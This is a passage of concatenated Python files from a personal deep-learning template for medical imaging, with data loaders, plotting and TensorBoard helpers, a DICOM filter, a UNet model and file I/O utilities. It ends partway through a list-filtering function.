# model = resnet2d.ResNet(dataset='calc', depth=34, num_classes=num_classes)
#
# criterion = torch.nn.BCELoss().cuda()
#
# # print(train_dataloader.batch_size)
#
# for i, (images,labels) in enumerate(train_dataloader):
# # print(sample['image'])
# outputs = model(images)
# labels = labels.float().reshape(-1,1)
# print(outputs.shape,labels.shape)
# loss = criterion(outputs,labels)
# print('loss: ',loss)
valconfig = {"dataset": "tb2020","subset": '0'}
val_config = dataconfig(**valconfig)
validation_data = DataGenerator(val_config,transform= None,type='1: slice_sampled')
#val_loader = DataLoader(validation_data, batch_size=12, num_workers=1, shuffle=True)
#batch_sampler = batch_sampler(batch_size=6,class_list=range(6))
val_loader = DataLoader(validation_data,num_workers=1,sampler=BalancedBatchSampler(validation_data,type='multi_label'),batch_size=6)
for i, (images, labels) in enumerate(val_loader):
print(i)
print(labels)
print(images.shape)
<file_sep>"""Utility functions for data exploration"""
import json
import matplotlib.pylab as plt
import pandas as pd
import seaborn as sns
sns.set(style="darkgrid")
plt.rcParams['figure.figsize'] = (6, 6)
def plot_scatter(df, vars=['width', 'height'], hue='birads',
logy=True, logx=True, color_palette="Set2"):
"""Plot scatter plot
Args:
df:
vars: list of columns to plot, in the order of [x, y]
hue:
logy:
logx:
color_palette:
Returns:
None
"""
xlabel, ylabel = vars[:2]
hue_order = sorted(df[hue].unique())
colors = sns.color_palette(color_palette, len(hue_order))
# if any value is string and cannot be converted to a numerical value, plot categorically
is_categorical = any([type(a) is str and not a.isdigit() for a in df[ylabel].unique()])
if is_categorical:
y_order = sorted(df[ylabel].unique())
for idx, label in enumerate(hue_order):
df_tmp = df[df[hue] == label]
xs = df_tmp[xlabel]
ys = df_tmp[ylabel]
if is_categorical:
ys = ys.apply(lambda x: y_order.index(x))
plt.scatter(xs, ys, color=colors[idx], label=label)
plt.xlabel(xlabel)
plt.ylabel(ylabel)
plt.legend()
if logx:
plt.xscale('log')
if logy and not is_categorical:
plt.yscale('log')
if is_categorical:
# print(list(zip(*(enumerate(hue_order)))))
plt.yticks(*zip(*(enumerate(y_order))))
def plot_bubble(df, vars=['disease', 'birads'], color='b'):
"""Plot bubble chart for categorical data
Args:
df:
vars:
color:
Returns:
None
"""
xlabel, ylabel = vars[:2]
df_group = df.groupby([xlabel, ylabel]).count()['size']
x_order = sorted(df[xlabel].unique())
y_order = sorted(df[ylabel].unique())
max_count = max(df_group)
for idx, count in df_group.iteritems():
count /= max_count
x_idx, y_idx = idx
x, y = x_order.index(x_idx), y_order.index(y_idx)
plt.scatter(x, y, s=count * 10000, c=color, alpha=0.2, edgecolors='gray', linewidth=0)
plt.xticks(*zip(*(enumerate(x_order))))
plt.yticks(*zip(*(enumerate(y_order))))
plt.xlabel(xlabel)
plt.ylabel(ylabel)
plt.title('Categorical Count')
def test():
json_file = '/tmp/lesion_dict.json'
with open(json_file, 'r') as f_in:
lesion_dict = json.load(f_in)
for key in list(lesion_dict.keys()):
for idx in lesion_dict[key].keys():
new_key = key + '-' + idx
lesion_dict[new_key] = lesion_dict[key][idx]
lesion_dict.pop(key)
df = pd.DataFrame.from_dict(lesion_dict, orient='index')
df = df.drop(['bbox'], axis=1)
df['size'] = ((df['width'] * df['height']) ** 0.5).astype(int)
plt.figure()
plot_scatter(df, vars=['size', 'birads'], hue='disease')
plt.show()
plot_bubble(df, vars=['birads', 'disease'])
plt.show()
if __name__ == '__main__':
test()<file_sep>import torch
import torchvision
import numpy as np
import matplotlib.pylab as plt
def calculate_accuracy_binary(outputs, targets):
outputs = outputs.data.cpu().numpy().flatten()
targets = targets.data.cpu().numpy().flatten()
hit = ((outputs > 0.5) == targets).sum()
#hit = sum(abs(outputs-targets))
tsum = targets.shape[0]
return (hit + 1e-8) / (tsum + 1e-8)
def calculate_accuracy(outputs, targets):
#outputs = outputs.data.cpu().numpy().flatten()
#targets = targets.data.cpu().numpy().flatten()
max_vals, max_indices = torch.max(outputs, 1)
acc = (max_indices == targets.long()).sum().data.cpu().numpy() / max_indices.size()[0]
return acc
def image_cat(inputs,bs):
data=[]
for h in range(bs):
data.append(inputs[h, :, :, :])
data = [x for x in data]
data_all = torchvision.utils.make_grid(data, nrow=int(np.ceil(np.sqrt(len(data)))), padding=10, normalize=True,
range=None, scale_each=True)
return data_all
def add_image_unet(inputs,masks,est_maps,outputs, targets, writer, subset, epoch):
outputs = outputs.data.cpu().numpy()
targets = targets.data.cpu().numpy()
# print('image added... with len of {}'.format(len(targets)))
data_all = image_cat(inputs,targets.shape[0])
mask_all = image_cat(masks, targets.shape[0])
estmaps_all = image_cat(est_maps, targets.shape[0])
if subset == 'val':
writer.add_image(subset + '_step_' + str(epoch) + '/diff_'+str(sum(abs(outputs-targets))) + '/gt:' + str(targets) + '/pred:' + str(outputs),
img_tensor=data_all, global_step=epoch, dataformats='CHW')
writer.add_image(subset + '_step_' + str(epoch) + '/diff_' + str(sum(abs(outputs - targets))) + '/gt:' + str(
targets) + '/pred:' + str(outputs),
img_tensor=mask_all, global_step=epoch, dataformats='CHW')
writer.add_image(subset + '_step_' + str(epoch) + '/diff_' + str(sum(abs(outputs - targets))) + '/gt:' + str(
targets) + '/pred:' + str(outputs),
img_tensor=mask_all, global_step=epoch, dataformats='CHW')
else:
writer.add_image(subset + '_step_' + str(epoch ),img_tensor=data_all, global_step=epoch, dataformats='CHW')
def add_image_3d(inputs, outputs, targets, writer, subset, epoch,name):
outputs = outputs.data.cpu().numpy()
targets = targets.data.cpu().numpy()
# print('image added... with len of {}'.format(len(targets)))
data = []
for h in range(targets.shape[0]):
data.append(inputs[h, :, :, :])
data = [x for x in data]
# data = torch.cat(data, dim=0)
data_all = torchvision.utils.make_grid(data, nrow=int(np.ceil(np.sqrt(len(data)))), padding=10, normalize=True, range=None, scale_each=True)
# if subset == 'val':
# writer.add_image(subset + '_step_' + str(epoch) + '/Diff_'+str(sum(sum(abs(outputs-targets)))) + '/diff_'+str(sum(abs(outputs-targets))) + '/gt:' + str(targets) + '/pred:' + str(outputs),
# img_tensor=data_all, global_step=epoch, dataformats='CHW')
if subset == 'val':
# print('val image added')
writer.add_image(subset + '_step_' + str(epoch) +'/'+ name + '/diff_'+str(sum(abs(outputs-targets))) + '/gt:' + str(targets) + '/pred:' + str(outputs),
img_tensor=data_all, global_step=epoch, dataformats='CHW')
else:
# print('train image added')
writer.add_image(subset + '_step_' + str(epoch )+'/'+name,img_tensor=data_all, global_step=epoch, dataformats='CHW')
def add_image(inputs, outputs, targets, writer, subset, epoch):
outputs = outputs.data.cpu().numpy().flatten()
targets = targets.data.cpu().numpy().flatten()
for h in range(targets.shape[0]):
data = []
data.append(inputs[h, :, :, :])
data = [x for x in data]
data = torch.cat(data, dim=1)
data_all = torchvision.utils.make_grid(data, nrow=1, padding=2, normalize=False, range=None, scale_each=False)
writer.add_image(subset + '_step_' + str(epoch) + '/gt: ' + str(targets[h]) + '/pred: ' + str(outputs[h]),
img_tensor=data_all, global_step=epoch, dataformats='CHW')
def add_gl_image(images,patches, outputs, targets, writer, subset, epoch):
outputs = outputs.data.cpu().numpy().flatten()
targets = targets.data.cpu().numpy().flatten()
for h in range(targets.shape[0]):
data_g = []
data_l = []
data_g.append(images[h, :, :, :])
data_l.append(patches[h, :, :, :])
data_g = [x for x in data_g]
data_l = [x for x in data_l]
data_g = torch.cat(data_g, dim=1)
data_l = torch.cat(data_l, dim=1)
data_g_all = torchvision.utils.make_grid(data_g, nrow=1, padding=2, normalize=False, range=None, scale_each=False)
data_l_all = torchvision.utils.make_grid(data_l, nrow=1, padding=2, normalize=False, range=None,
scale_each=False)
writer.add_image(subset + '_step_' + str(epoch) + '/diff_'+str(abs(outputs[h]-targets[h])) + '_g_/gt: ' + str(targets[h]) + '/pred: ' + str(outputs[h]),img_tensor=data_g_all, global_step=epoch, dataformats='CHW')
writer.add_image(subset + '_step_' + str(epoch) + '/diff_'+str(abs(outputs[h]-targets[h])) + '_l_/gt: ' + str(targets[h]) + '/pred: ' + str(outputs[h]),img_tensor=data_l_all, global_step=epoch, dataformats='CHW')
def add_gld_image(images,patches,details, outputs, targets, writer, subset, epoch):
outputs = outputs.data.cpu().numpy().flatten()
targets = targets.data.cpu().numpy().flatten()
for h in range(targets.shape[0]):
data_g = []
data_l = []
data_d = []
data_g.append(images[h, :, :, :])
data_l.append(patches[h, :, :, :])
data_d.append(details[h, :, :, :])
data_g = [x for x in data_g]
data_l = [x for x in data_l]
data_d = [x for x in data_d]
data_g = torch.cat(data_g, dim=1)
data_l = torch.cat(data_l, dim=1)
data_d = torch.cat(data_d, dim=1)
data_g_all = torchvision.utils.make_grid(data_g, nrow=1, padding=2, normalize=False, range=None, scale_each=False)
data_l_all = torchvision.utils.make_grid(data_l, nrow=1, padding=2, normalize=False, range=None,
scale_each=False)
data_d_all = torchvision.utils.make_grid(data_d, nrow=1, padding=2, normalize=False, range=None,
scale_each=False)
writer.add_image(subset + '_step_' + str(epoch) + '/diff_'+str(abs(outputs[h]-targets[h])) + '_g_/gt: ' + str(targets[h]) + '/pred: ' + str(outputs[h]),img_tensor=data_g_all, global_step=epoch, dataformats='CHW')
writer.add_image(subset + '_step_' + str(epoch) + '/diff_'+str(abs(outputs[h]-targets[h])) + '_l_/gt: ' + str(targets[h]) + '/pred: ' + str(outputs[h]),img_tensor=data_l_all, global_step=epoch, dataformats='CHW')
writer.add_image(
subset + '_step_' + str(epoch) + '/diff_' + str(abs(outputs[h] - targets[h])) + '_d_/gt: ' + str(
targets[h]) + '/pred: ' + str(outputs[h]), img_tensor=data_d_all, global_step=epoch, dataformats='CHW')
def add_gl_image_index(images, patches, outputs, targets, writer, subset, epoch,index):
outputs = outputs.data.cpu().numpy().flatten()
targets = targets.data.cpu().numpy().flatten()
for h in range(targets.shape[0]):
data_g = []
data_l = []
data_g.append(images[h, :, :, :])
data_l.append(patches[h, :, :, :])
data_g = [x for x in data_g]
data_l = [x for x in data_l]
data_g = torch.cat(data_g, dim=1)
data_l = torch.cat(data_l, dim=1)
data_g_all = torchvision.utils.make_grid(data_g, nrow=1, padding=2, normalize=False, range=None,
scale_each=False)
data_l_all = torchvision.utils.make_grid(data_l, nrow=1, padding=2, normalize=False, range=None,
scale_each=False)
writer.add_image(
subset + '_step_' + str(epoch)+ '_diff_' + str(outputs[h] - targets[h]) + '_index_' + str(index) + '/g_gt: ' + str(
targets[h]) + '/pred: ' + str(outputs[h]), img_tensor=data_g_all, global_step=epoch,
dataformats='CHW')
writer.add_image(
subset + '_step_' + str(epoch)+ '_diff_' + str(outputs[h] - targets[h]) + '_index_' + str(index) + '/l_gt: ' + str(
targets[h]) + '/pred: ' + str(outputs[h]), img_tensor=data_l_all, global_step=epoch,
dataformats='CHW')
def add_gld_image_index(images, patches, details, outputs, targets, writer, subset, epoch,index):
outputs = outputs.data.cpu().numpy().flatten()
targets = targets.data.cpu().numpy().flatten()
for h in range(targets.shape[0]):
data_g = []
data_l = []
data_d = []
data_g.append(images[h, :, :, :])
data_l.append(patches[h, :, :, :])
data_d.append(details[h, :, :, :])
data_g = [x for x in data_g]
data_l = [x for x in data_l]
data_d = [x for x in data_d]
data_g = torch.cat(data_g, dim=1)
data_l = torch.cat(data_l, dim=1)
data_d = torch.cat(data_d, dim=1)
data_g_all = torchvision.utils.make_grid(data_g, nrow=1, padding=2, normalize=False, range=None,
scale_each=False)
data_l_all = torchvision.utils.make_grid(data_l, nrow=1, padding=2, normalize=False, range=None,
scale_each=False)
data_d_all = torchvision.utils.make_grid(data_d, nrow=1, padding=2, normalize=False, range=None,
scale_each=False)
writer.add_image(
subset + '_step_' + str(epoch)+ '_diff_' + str(outputs[h] - targets[h]) + '_index_' + str(index) + '/g_gt: ' + str(
targets[h]) + '/pred: ' + str(outputs[h]), img_tensor=data_g_all, global_step=epoch,
dataformats='CHW')
writer.add_image(
subset + '_step_' + str(epoch)+ '_diff_' + str(outputs[h] - targets[h]) + '_index_' + str(index) + '/l_gt: ' + str(
targets[h]) + '/pred: ' + str(outputs[h]), img_tensor=data_l_all, global_step=epoch,
dataformats='CHW')
writer.add_image(
subset + '_step_' + str(epoch) + '_diff_' + str(outputs[h] - targets[h]) + '_index_' + str(
index) + '/d_gt: ' + str(
targets[h]) + '/pred: ' + str(outputs[h]), img_tensor=data_d_all, global_step=epoch,
dataformats='CHW')
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
<file_sep>"""Utility functions for tensorflow"""
import tensorflow as tf
FLAGS = tf.app.flags.FLAGS
class FlagsObjectView(object):
"""For tensorflow 1.5 and above"""
def __init__(self, FLAGS):
self.__dict__ = FLAGS.flag_values_dict()
<file_sep>#!/usr/bin/env python
# -*- coding: utf-8 -*-
import glob2
import os
try:
import dicom
except:
import pydicom as dicom
import shutil
from tqdm import tqdm
import json
def writeinfo(output_filename, content):
"""Write the content to txt
Args:
output_filename:
content:
Returns:
"""
if not os.path.isfile(output_filename):
mode = "w"
else:
mode = "a"
with open(output_filename, mode, encoding="utf-8") as f:
f.write(content)
f.write('\n')
def recursive_copy(src_dir, dst_dir):
"""Copy all files form src_dir to dst_dir with the same filename
Args:
src_dir:
dst_dir:
Returns:
"""
files = os.listdir(src_dir)
for file in files:
src_file = os.path.join(src_dir, file)
dst_file = os.path.join(dst_dir, file)
shutil.copyfile(src_file, dst_file)
class DicomFilter(object):
"""Filter out the dicom data that do not meed the demand in json file
Args:
input_dir:
config_file: jsonfile
output_dir
"""
def __init__(self, input_dir, config_file, output_dir):
self._input_dir = input_dir
self._config_file = config_file
self._output_dir = output_dir
self._all_dcm_list = glob2.glob(os.path.join(self._input_dir, "**", "*"))
self._inlier_txt = os.path.join(self._input_dir, "inlier.txt")
self._outlier_txt = os.path.join(self._input_dir, "outlier.txt")
self._notag_txt = os.path.join(self._input_dir, "notag.txt")
def read_config(self):
pass
def filter_fracture(self, iscopy=False):
"""
Args:
iscopy:
Returns:
"""
fracture_filtered = []
print("*********fracture filter******")
for dcm in tqdm(self._all_dcm_list):
if os.path.isdir(dcm):
continue
try:
ds = dicom.read_file(dcm)
except:
continue
# print(dcm)
try:
study_description = ds.StudyDescription
content = dcm + "\t" + study_description
if 'chest' in study_description.lower() or 'rib' in study_description.lower() or 'body' in study_description.lower():
fracture_filtered.append(dcm)
# writeinfo(self._inlier_txt, content)
continue
else:
writeinfo(self._outlier_txt, content)
except:
content = dcm + " No StudyDescription Flag"
writeinfo(self._notag_txt, content)
print("No StudyDescription Flag")
try:
series_description = ds.SeriesDescription
content = dcm + "\t" + series_description
if 'chest' in series_description.lower() or 'rib' in series_description.lower() or 'body' in series_description.lower():
fracture_filtered.append(dcm)
# writeinfo(self._inlier_txt, content)
continue
else:
writeinfo(self._outlier_txt, content)
except:
content = dcm + " No SeriesDescription Flag"
writeinfo(self._notag_txt, content)
print("No SeriesDescription Flag")
try:
body_part_examined = ds.BodyPartExamined
content = dcm + "\t" + body_part_examined
if 'chest' in body_part_examined.lower() or 'rib' in body_part_examined.lower() or 'body' in body_part_examined.lower():
fracture_filtered.append(dcm)
# writeinfo(self._inlier_txt, content)
continue
else:
writeinfo(self._outlier_txt, content)
except:
content = dcm + " No BodyPartExamined Flag"
writeinfo(self._notag_txt, content)
print("No BodyPartExamined Flag")
try:
protocol_name = ds.ProtocolName
content = dcm + "\t" + protocol_name
if 'chest' in protocol_name.lower() or 'rib' in protocol_name.lower() or 'body' in protocol_name.lower():
fracture_filtered.append(dcm)
# writeinfo(self._inlier_txt, content)
continue
else:
writeinfo(self._outlier_txt, content)
except:
content = dcm + " No Protocol Flag"
writeinfo(self._notag_txt, content)
print("No Protocol Flag")
self._all_dcm_list = fracture_filtered
def filter_PA(self, iscopy=False):
"""
Returns:
None
Write out at most three txt file inlier.txt, outlier.txt, notag.txt
"""
filtered = []
print("*********PA filter******")
for dcm in tqdm(self._all_dcm_list):
if os.path.isdir(dcm):
continue
# print(dcm)
img = dicom.read_file(dcm)
try:
view_position = img.ViewPosition
except:
try:
view_position = img.ProtocolName
except:
content = dcm + " No ViewPosition and ProtocolName tag"
writeinfo(self._notag_txt, content)
continue
if view_position == "PA":
filtered.append(dcm)
output_txt = self._inlier_txt
# copy the file
if iscopy:
if not os.path.exists(self._output_dir):
os.makedirs(self._output_dir)
src_dcm = dcm
dst_dcm = os.path.join(self._output_dir, os.path.basename(src_dcm))
shutil.copyfile(src_dcm, dst_dcm)
else:
output_txt = self._outlier_txt
content = dcm + "\t" + view_position
writeinfo(output_txt, content)
if __name__ == "__main__":
root_dir = r"/media/Data/Data02/Datasets/DR/Collection/China_Sample"
for dir in os.listdir(root_dir):
input_dir = os.path.join(root_dir, dir)
output_dir = r""
config_file = r""
dcm_filter = DicomFilter(input_dir, config_file, output_dir)
dcm_filter.filter()<file_sep>import numpy as np
import pandas as pd
import tensorflow as tf
import glob2
import glob
import os
import re
import matplotlib.pylab as plt
import matplotlib
<file_sep>from projects.drutils.bbox import calculate_union_area, calculate_union_area_v2
import numpy as np
def test_area():
np.random.seed(12)
max_pos = 10 ** 4
num_box = 30
boxes = np.random.randint(max_pos, size=(num_box, 4))
for box in boxes:
box[0], box[2] = min(box[0], box[2]), max(box[0], box[2])
box[1], box[3] = min(box[1], box[3]), max(box[1], box[3])
for i in range(num_box):
partial = boxes[:i + 1, ]
print(i)
result_1 = calculate_union_area(partial)
result_2 = calculate_union_area_v2(partial)
print(result_1, result_2)
assert (int(result_1) == int(result_2))
if __name__ == '__main__':
test_area()
<file_sep>import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
from SDFY_project.unet_model.unet_parts import *
class UNet(nn.Module):
def __init__(self, n_channels, n_classes,
height, width,
n_seg_classes=1,
device=torch.device('cuda')):
super(UNet, self).__init__()
self.device = device
self.n_classes = n_classes
# With this network depth, there is a minimum image size
if height < 256 or width < 256:
raise ValueError('Minimum input image size is 256x256, got {}x{}'.\
format(height, width))
self.inc = inconv(n_channels, 64)
self.down1 = down(64, 128)
self.down2 = down(128, 256)
self.down3 = down(256, 512)
self.down4 = down(512, 512)
self.down5 = down(512, 512)
self.down6 = down(512, 512)
self.down7 = down(512, 512)
self.down8 = down(512, 512, normaliz=False)
self.up1 = up(1024, 512)
self.up2 = up(1024, 512)
self.up3 = up(1024, 512)
self.up4 = up(1024, 512)
self.up5 = up(1024, 256)
self.up6 = up(512, 128)
self.up7 = up(256, 64)
self.up8 = up(128, 64, activ=False)
self.outc = outconv(64, n_seg_classes)
self.out_nonlin = nn.Sigmoid() # to solve the predict map wired problem @ 20190924 Xing
# self.softmax = nn.LogSoftmax(dim=1)
steps = 8
height_mid_features = height // (2 ** steps)
width_mid_features = width // (2 ** steps)
self.branch_1 = nn.Sequential(nn.Linear(height_mid_features * \
width_mid_features * \
512,
64),
nn.ReLU(inplace=True),
nn.Dropout(p=0.5))
self.branch_2 = nn.Sequential(nn.Linear(height * width, 64),
nn.ReLU(inplace=True),
nn.Dropout(p=0.5))
if n_classes is None:
self.regressor = nn.Sequential(nn.Linear(64 + 64, 1),
nn.ReLU())
else:
# self.fc1 = nn.Sequential(nn.Linear(64+64,16,bias=False),nn.ReLU(inplace=True))
self.fc = nn.Linear(64+64,n_classes,bias=False)
self.softmax = nn.LogSoftmax(dim=1)
# This layer is not connected anywhere
# It is only here for backward compatibility
self.lin = nn.Linear(1, 1, bias=False)
def forward(self, x):
batch_size = x.shape[0]
# print(batch_size)
x1 = self.inc(x)
x2 = self.down1(x1)
x3 = self.down2(x2)
x4 = self.down3(x3)
x5 = self.down4(x4)
x6 = self.down5(x5)
x7 = self.down6(x6)
x8 = self.down7(x7)
x9 = self.down8(x8)
x = self.up1(x9, x8)
x = self.up2(x, x7)
x = self.up3(x, x6)
x = self.up4(x, x5)
x = self.up5(x, x4)
x = self.up6(x, x3)
x = self.up7(x, x2)
x = self.up8(x, x1)
x= self.outc(x)
x = self.out_nonlin(x) # do not use the sigmoid @20190924 by Xing
# Reshape Bx1xHxW -> BxHxW
# because probability map is real-valued by definition
x = x.squeeze(1)
x9_flat = x9.view(batch_size, -1)
x_flat = x.view(batch_size, -1)
# print(x9_flat.shape)
x10_flat = self.branch_1(x9_flat)
x_flat = self.branch_2(x_flat)
final_features = torch.cat((x_flat, x10_flat), dim=1)
if self.n_classes is None:
regression = self.regressor(final_features)
return x, regression
else:
if self.n_classes == 1:
classification = self.out_nonlin(self.fc(final_features))
else:
classification = self.softmax(self.fc(final_features))
return x,classification
if __name__ == "__main__":
num_classes = 5
input_tensor = torch.autograd.Variable(torch.rand(6, 3, 512, 512)).cuda()
# model = resnet50(class_num=num_classes)
model = UNet(n_channels=3,n_classes=num_classes,height=512,width=512).cuda()
output = model(input_tensor)
print(output)
<file_sep>"""Unility functions for manipulatiing nifti (.nii) files"""
import SimpleITK as sitk
import numpy as np
from matplotlib import pylab as plt
def load_image_array_from_nii(nii_path):
sitk_img = sitk.ReadImage(nii_path)
image_array_3d = sitk.GetArrayFromImage(sitk_img)
return image_array_3d
def load_sitk_image(nii_path):
sitk_img = sitk.ReadImage(nii_path)
return sitk_img
def write_array_to_nii(image_array_3d, header_itk_img=None, output_path=None):
"""Write array to itk image with optional header
Args:
image_array_3d: image array to write array to
header_itk_img: optional, itk image to copy header from
output_path:
Returns:
"""
img_aligned = sitk.GetImageFromArray(image_array_3d)
if header_itk_img is not None:
try:
try:
img_aligned.CopyInformation(header_itk_img)
except:
img_aligned.SetDirection(header_itk_img.GetDirection())
img_aligned.SetOrigin(header_itk_img.GetOrigin())
img_aligned.SetSpacing(header_itk_img.GetSpacing())
except:
# for 2d nii image, there is no such header info
print('Cannot copy header from {}'.format(header_itk_img))
if output_path:
print('Writing to {}'.format(output_path))
sitk.WriteImage(img_aligned, output_path)
return img_aligned
def resample_3d_by_spacing(seg_img, new_spacing=(1, 1, 1)):
"""Resample seg_img with new_spacing
Args:
seg_img:
new_spacing:
Returns:
"""
old_spacing = seg_img.GetSpacing()
new_spacing = new_spacing
new_size = tuple(np.array(seg_img.GetSize()) * np.array(old_spacing) / np.array(new_spacing))
new_size = [int(x) for x in new_size]
resampled_seg_img = sitk.Resample(seg_img, new_size, sitk.Transform(),
sitk.sitkNearestNeighbor, seg_img.GetOrigin(),
new_spacing, seg_img.GetDirection(), 0.0,
seg_img.GetPixelIDValue())
return resampled_seg_img
def myshow(img, spacing=None, title=None, figsize=(6, 6), fig=None):
"""
Args:
img: sitk image or numpy array
spacing:
title:
Returns:
"""
if isinstance(img, np.ndarray):
nda = img
else:
nda = sitk.GetArrayViewFromImage(img)
if spacing is None:
if isinstance(img, np.ndarray):
spacing = (1, 1)
else:
spacing = img.GetSpacing()
ysize, xsize = nda.shape[:2]
if fig is None:
fig = plt.figure(title, figsize=figsize)
extent = (0, xsize * spacing[1], ysize * spacing[0], 0)
t = plt.imshow(nda,
extent=extent,
interpolation='hamming',
cmap='gray',
origin='upper')
# plt.colorbar()
if (title):
plt.title(title)
return fig
<file_sep># template
My own deep learning template.
A start point for a lot of my projects, contains followings:
1. data geneartion and preprocessing;
2. dataset generator with balanced sampler
3. data train with lr_cosine for both resnet and unet/gan
4. tensorflow
5. evaluation
to be continue.
<file_sep>"""This file contains utility functions used for file io"""
import cv2
import pandas as pd
import os
import json
import errno
import shutil
import numpy as np
import glob2
from PIL import Image
import nibabel as nib
import logging
from matplotlib import pylab as plt
def maybe_make_new_dir(new_directory):
""" Make directory if it does not already exist """
logging.basicConfig(level=logging.INFO, format='%(asctime)s %(message)s')
if not os.path.exists(new_directory):
os.makedirs(new_directory)
logging.debug('Making new directory {}'.format(new_directory))
def copy_tree(from_folder, to_folder, **kwargs):
"""Recursively copies from one folder to another
This function is a wrapper for distutils.dir_util.copy_tree() but ignores time and mode copy
Often time and mode are not important but sometimes causes permission error. This wrapper
by default just copies but ignore such error.
Args:
from_folder:
to_folder:
Returns:
"""
from distutils.dir_util import copy_tree
preserve_times = kwargs.pop('preserve_times', 0)
preserve_mode = kwargs.pop('preserve_mode', 0)
update = kwargs.pop('update', 0)
copy_tree(from_folder, to_folder,
preserve_times=preserve_times,
preserve_mode=preserve_mode,
update=update,
**kwargs)
def overwrite_guard(output_dir):
"""If the output_dir folder already exists and is non-empty, throw an error
Args:
output_dir:
Returns:
None
"""
#
if os.path.isdir(output_dir) and os.listdir(output_dir):
msg = 'Output folder is not empty: {}\nDo you still want to proceed?'.format(output_dir)
shall = input("%s (y/N) " % msg).lower() == 'y'
if not shall:
raise FileExistsError('Please empty {} and proceed.'.format(output_dir))
else:
maybe_make_new_dir(output_dir)
def load_image_to_array(path, dtype=np.float32, mode='unchanged'):
"""Load image to array"""
try:
if mode == 'rgb':
# load as RGB
image_array = np.array(cv2.imread(path, 1), dtype)
elif mode == 'unchanged':
image_array = np.array(cv2.imread(path, -1), dtype)
elif mode == 'gray':
image_array = np.array(cv2.imread(path, 0), dtype)
else:
raise ValueError('unsupported mode')
except:
if path.endswith('.nii'):
image_array = nib.load(path).get_fdata().T
else:
raise IOError('Cannot open {}'.format(path))
return image_array
def silentremove(filepath):
"""Remove a filename if it exists
Args:
filepath: path to the file to be removed
Returns:
"""
try:
os.remove(filepath)
except OSError as e: # this would be "except OSError, e:" before Python 2.6
if e.errno != errno.ENOENT: # errno.ENOENT = no such file or directory
raise # re-raise exception if a different error occurred
def read_list_from_txt(txt_file, sep=',', field=None):
"""
Get a list of filepath from a txt file
Args:
txt_file: file path to a txt, each line of it contains a file path.
If there are more than one comma separated field, get the field_idx'th field
field: optional, index of field to extract, if -1 then read the whole line
Return:
file_path_list: a list of file paths
"""
with open(txt_file, 'r') as f_in:
lines = f_in.readlines()
if field is None:
file_path_list = [line.strip() for line in lines]
else:
file_path_list = [np.array(line.strip().split(sep))[field].tolist() for line in lines]
return file_path_list
def get_list_of_filepath_from_txt(txt_file, field=0):
"""
Get a list of filepath from a txt file
"""
return read_list_from_txt(txt_file, field)
def get_list_of_labels_from_txt(txt_file, field=1):
"""
Get a list of filepath from a txt file
"""
return read_list_from_txt(txt_file, field)
def dump_list_to_file(filename_list, txt_file, name='', label_list=[]):
"""
Write a list to file, with
Args:
filename_list: a list of filenames
txt_file: file to a text file to write list to
name: optional, name of the list
label_list: optional, list of labels corresponding to filename_list
Return:
None
"""
print('Writing list {} of length {} to txt file {}'.format(name, len(filename_list), txt_file))
with open(txt_file, 'w', encoding='utf-8') as f_out:
if label_list:
assert len(filename_list) == len(label_list), 'filename_list and label_list must have the same length!'
for filename, label in zip(filename_list, label_list):
f_out.write('{},{}\n'.format(filename, label))
else:
for filename in filename_list:
f_out.write('{}\n'.format(filename))
def substitute_string_in_txt(old_string, new_string, filepath):
"""
Substitute old_string with new_string in text file filepath
"""
backup_filepath = filepath + '.tmp'
shutil.copyfile(filepath, backup_filepath)
new_filepath = '/tmp/tmp.txt'
with open(new_filepath, 'w') as f_out:
with open(backup_filepath, 'r') as f_in:
for line in f_in:
newline = line.replace(old_string, new_string)
f_out.write(newline)
shutil.copyfile(new_filepath, filepath)
def remove_leading_char_a(filepath):
"""Remove the leading character `a` in the image file name to match original nih dataset"""
file_dir = os.path.dirname(filepath)
basename = os.path.basename(filepath)[1:]
new_filepath = os.path.join(file_dir, basename)
return new_filepath
def list_file_in_directory(directory, ext='', path_level='noext', depth=1):
"""
List files in a directory.
Args:
directory:
ext: extension (suffix) to search directory for
path_level: optional. Default to 'noext'. It can take the following values:
'full': full path
'partial': partial path starting from directory
'basename': basename
'noext': basename without extension
depth: can be 1 or -1 (recursive).
Returns:
A list of filenames
"""
# make sure there is one and only one separator char at the end of directory
directory = directory.rstrip(os.path.sep) + os.path.sep
if depth == 1:
filepath_list = glob2.glob(os.path.join(directory, '*' + ext))
elif depth == -1:
filepath_list = glob2.glob(os.path.join(directory, '**', '*' + ext))
else:
raise ValueError('`depth` can only be 1 or -1 (recursive)!')
filepath_list = [filepath for filepath in filepath_list if os.path.isfile(filepath)]
if path_level == 'full':
return filepath_list
if path_level == 'partial':
filepath_list = [filepath.replace(directory, '') for filepath in filepath_list]
if path_level == 'basename':
filepath_list = [os.path.basename(filepath) for filepath in filepath_list]
if path_level == 'noext':
filepath_list = [os.path.splitext(os.path.basename(filepath))[0] for filepath in filepath_list]
return filepath_list
def get_ignore_file_list(raw_dir, cleaned_dir, ext=''):
"""
Get a list of files that are in raw_dir but not in cleaned_dir
Args:
raw_dir:
cleaned_dir:
Returns:
list_to_ignore: a list of file names to ignore
"""
raw_filelist = list_file_in_directory(raw_dir, ext=ext, path_level='basename')
cleaned_filelist = list_file_in_directory(cleaned_dir, ext=ext, path_level='basename')
print(len(raw_filelist))
print(len(cleaned_filelist))
list_to_ignore = list(set(raw_filelist) - set(cleaned_filelist))
return list_to_ignore
def read_image_from_path(image_path, channels=3):
"""Read image from a file
Args:
image_path: path to the image file
channels: can be 1 or 3. If 1, then the shape of image_array is (height, width). If 3,
the shape of image_array is (height, width, 3)
Returns:
image_array
"""
assert channels in [1, 3]
image_array = plt.imread(image_path, -1)
if channels == 3:
if len(image_array.shape) == 2:
image_array = np.dstack([image_array] * 3)
assert len(image_array.shape) == 3 and image_array.shape[-1] == 3
if channels == 1:
assert len(image_array.shape) == 2
return image_array
def filter_list(input_list, key_fn=(lambda x: x), filter_keys=None):
"""Filter a list with a list of keys
Args:
input_list: list to be filtered
key_fn: a function to generate keys from elements in the list
filter_keys: keys to intersect with
Returns:
filtered_input_list: filtered list
"""
if filter_keys is None:
filtered_input_list = input_list
else:
input_dict = {key_fn(x): x for x in input_list}
keys = set(input_dict.keys()) & set(filter_keys)
keys = sorted(list(keys))
